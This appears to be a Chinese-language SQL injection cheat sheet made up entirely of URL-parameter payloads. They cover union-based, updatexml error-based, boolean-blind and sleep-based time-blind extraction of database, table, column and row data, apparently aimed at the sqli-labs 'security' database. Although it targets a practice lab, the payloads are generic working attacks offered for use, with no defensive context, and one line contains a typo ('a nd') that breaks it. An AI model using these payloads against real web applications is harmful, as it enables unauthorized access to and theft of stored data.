sql注入手注语句

?id=100 'union select 1,database(),3-- asd
​
?id=100 'union select 1,table_name,3 from information_schema.tables where table_schema='security' limit 0,1-- asd
?id=100 'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()-- asd
​
?id=100 'union select 1,column_name,3 from information_schema.columns where table_schema='security' and table_name='emails'limit 0,1-- asd
?id=100 'union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security'and table_name='emails'-- asd
​
?id=-7' union select 1,group_concat(id),3 from emails -- asd
​
​
//updatexml
​
?id=1" and updatexml(1,concat(0x7e,(select database())),3)-- asd
​
?id=1" and updatexml (1, concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),3)-- asd
​
?id=1" and updatexml (1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='security'and table_name='emails'),0x7e),3)-- asd
​
?id=1" and updatexml (1,concat(0x7e,(select group_concat(id) from emails),0x7e),3)-- asd
​
?id=1'and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)))=101 -- asd
​
//布尔盲注
?id=1'and length(database())=8-- asd
​
?id=1'and ascii(substr(database(),1,1))=115 -- asd
​
?id=1' and(select count(table_name) from information_schema.tables where table_schema= database() )=4-- asd //查看库里有几个表
​
?id=1' and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=6-- asd//看第一个表名长度
​
?id=1'and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)))=101 -- asd//爆表名
​
?id=1'a nd (ascii(substr((select column_name from information_schema.columns where table_schema='security'and table_name='emails' limit 0,1),1,1)))=105 -- asd
​
?id=1'and (ascii(substr((select id from emails limit 0,1),1,1)))=4-- asd
​
//延时注入
?id=1'and if((length(database())=8),sleep(5),1)-- asd
​
?id=1' and if((ascii(substr(database(),1,1))=115),sleep(5),1)-- asd
​
?id=1' and if((ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))=101),sleep(5),1)-- asd
​
?id=1' and if((ascii(substr((select column_name from information_schema.columns where table_schema='security'and table_name='emails' limit 0,1),1,1))=105),sleep(5),1)-- asd
​
?id=1'and if((ascii(substr((select id from emails limit 0,1),1,1))=49),sleep(5),1)-- asd